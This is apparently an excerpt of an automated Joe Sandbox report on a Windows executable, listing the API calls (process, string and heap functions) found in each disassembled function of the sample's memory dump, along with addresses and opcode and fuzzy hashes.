                            APIs
                            • OpenProcess.KERNEL32(00000410,00000000), ref: 00454492
                            • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 004544AD
                            • CloseHandle.KERNEL32(00000000), ref: 004544B4
                            • lstrcpy.KERNEL32(00000000,?), ref: 004544E7
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                            • String ID:
                            • API String ID: 4028989146-0
                            • Opcode ID: fd183211b3be301c8bf4295170737bfdad27e792e810dda00a7d69026af88793
                            • Instruction ID: 15b62748e235d09dad5871f881b6c47ef1364735f4e03e5282e49cc1d9e2f334
                            • Opcode Fuzzy Hash: fd183211b3be301c8bf4295170737bfdad27e792e810dda00a7d69026af88793
                            • Instruction Fuzzy Hash: 0FF028B09412152BE7209B709D08BEBB6ACAF45309F000195EE84DB281DAF48CC487A4
                            APIs
                            • __getptd.LIBCMT ref: 00458FDD
                              • Part of subcall function 004587FF: __amsg_exit.LIBCMT ref: 0045880F
                            • __getptd.LIBCMT ref: 00458FF4
                            • __amsg_exit.LIBCMT ref: 00459002
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00459026
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: 7733955cc43c2dc843804d58a64178d946670a0961111f97d7d9e968a3486fbb
                            • Instruction ID: 82e70e36bea7a99a3b95e56a58c716d78897b10359c066bad21fd5863648aa5d
                            • Opcode Fuzzy Hash: 7733955cc43c2dc843804d58a64178d946670a0961111f97d7d9e968a3486fbb
                            • Instruction Fuzzy Hash: 3FF06232948610DAD660BB7A680675A23A16F04B1BF24451FFC44662D3DF6C5908DA5E
                            APIs
                            • lstrlen.KERNEL32(------,00435BEB), ref: 0045731B
                            • lstrcpy.KERNEL32(00000000), ref: 0045733F
                            • lstrcat.KERNEL32(?,------), ref: 00457349
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcatlstrcpylstrlen
                            • String ID: ------
                            • API String ID: 3050337572-882505780
                            • Opcode ID: 3ffda6a63688f296269f07fab111577cad5f789607f3f6586ca1cb3f08bf55cc
                            • Instruction ID: ec250612e04a2ec4bd95f41b61388001238ce540a9cb3bd1a7111fab2d181883
                            • Opcode Fuzzy Hash: 3ffda6a63688f296269f07fab111577cad5f789607f3f6586ca1cb3f08bf55cc
                            • Instruction Fuzzy Hash: 64F015B45003028FCB249F75E848927BAFAAF84701328982EAC9AC3315EA74D840CB20
                            APIs
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 00431557
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 00431579
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 0043159B
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 004315FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00443422
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044344B
                            • lstrcpy.KERNEL32(00000000,?), ref: 00443471
                            • lstrcpy.KERNEL32(00000000,?), ref: 00443497
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: 6a682a8cadf0a05e4faf81d539afe6e7d9359248dc388133ca6c416784eb6bd5
                            • Instruction ID: 735dbf1da75ec1d56e4d4cf40b93c1793e7be7befe2ad1d8f677ec2cb5e2d5b1
                            • Opcode Fuzzy Hash: 6a682a8cadf0a05e4faf81d539afe6e7d9359248dc388133ca6c416784eb6bd5
                            • Instruction Fuzzy Hash: 1D12F070A012019FEB28CF19C554B26B7E5BF45B1AB29C0AED809DB3A1D77ADD42CF44
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00447C94
                            • std::_Xinvalid_argument.LIBCPMT ref: 00447CAF
                              • Part of subcall function 00447D40: std::_Xinvalid_argument.LIBCPMT ref: 00447D58
                              • Part of subcall function 00447D40: std::_Xinvalid_argument.LIBCPMT ref: 00447D76
                              • Part of subcall function 00447D40: std::_Xinvalid_argument.LIBCPMT ref: 00447D91
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_
                            • String ID: string too long
                            • API String ID: 909987262-2556327735
                            • Opcode ID: e251a7f52b1ac06d33dfc2bfd6244bb40da466f5713dcbcfbcfa5f7f89bf655f
                            • Instruction ID: 0761edff3ad8345584eeaf21e4a43c7d18ef356a3107f7e457941fedcd68af9c
                            • Opcode Fuzzy Hash: e251a7f52b1ac06d33dfc2bfd6244bb40da466f5713dcbcfbcfa5f7f89bf655f
                            • Instruction Fuzzy Hash: 5031A5B23086148BF734DE6CE8C096BF7E9EF91754B204A2BF5428B641D7759C4283AD
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,?), ref: 00436F74
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00436F7B
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcess
                            • String ID: @
                            • API String ID: 1357844191-2766056989
                            • Opcode ID: 786cd172285618da3802a9c76dafcf7402dae45c44bc8d390d25e7c5ed598417
                            • Instruction ID: 4026ada9792b9f09c431aca7ac89e9e010f4a56a8855af47097d10fa3e911358
                            • Opcode Fuzzy Hash: 786cd172285618da3802a9c76dafcf7402dae45c44bc8d390d25e7c5ed598417
                            • Instruction Fuzzy Hash: 2B21A170600602ABEB208F20DC84BB773E8EB45704F44987DF946CB680E778E945C754
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 004515A1
                            • lstrcpy.KERNEL32(00000000,?), ref: 004515D9
                            • lstrcpy.KERNEL32(00000000,?), ref: 00451611
                            • lstrcpy.KERNEL32(00000000,?), ref: 00451649
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: 948a5dbfaedc3c64e3046d8b89451515de493ede1ad93097f78177387adb0153
                            • Instruction ID: 1b68d4d76e2740d62bc5b14c612208541f6621541eebf0ddd3a3e8545147b9c8
                            • Opcode Fuzzy Hash: 948a5dbfaedc3c64e3046d8b89451515de493ede1ad93097f78177387adb0153
                            • Instruction Fuzzy Hash: 572128B0601B029BD724EF3AC558B17B7F9AF48301F04591EE886C7B51EB78E805CBA4
                            APIs
                              • Part of subcall function 00431610: lstrcpy.KERNEL32(00000000), ref: 0043162D
                              • Part of subcall function 00431610: lstrcpy.KERNEL32(00000000,?), ref: 0043164F
                              • Part of subcall function 00431610: lstrcpy.KERNEL32(00000000,?), ref: 00431671
                              • Part of subcall function 00431610: lstrcpy.KERNEL32(00000000,?), ref: 00431693
                            • lstrcpy.KERNEL32(00000000,?), ref: 00431557
                            • lstrcpy.KERNEL32(00000000,?), ref: 00431579
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043159B
                            • lstrcpy.KERNEL32(00000000,?), ref: 004315FF
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: ddd0c53005e177201bed90291532f7b8a6752f8be77dbd6503f470d303878408
                            • Instruction ID: d47eab5fdd9beb9885e4416a1bb7869eccc7c47439deaa709d131a360e530cc2
                            • Opcode Fuzzy Hash: ddd0c53005e177201bed90291532f7b8a6752f8be77dbd6503f470d303878408
                            • Instruction Fuzzy Hash: 9831C5B4A01B02AFC724DF3AC588957BBE5BF49304B00592EE996C3B20DB74F811CB94
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 0043162D
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043164F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00431671
                            • lstrcpy.KERNEL32(00000000,?), ref: 00431693
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: c79fb67d782b793c60f66da0e8f735401bd0d96a9271f874b3fcb214f95fe5e4
                            • Instruction ID: c113a678ed3c4bfe285f1e5e98f26c465cd2d5960ad6a3d62f15e938ba532cbe
                            • Opcode Fuzzy Hash: c79fb67d782b793c60f66da0e8f735401bd0d96a9271f874b3fcb214f95fe5e4
                            • Instruction Fuzzy Hash: D81154B46117029BC7149F76D519927B7FCBF49301B08152EE886C3B60DB78E801CB54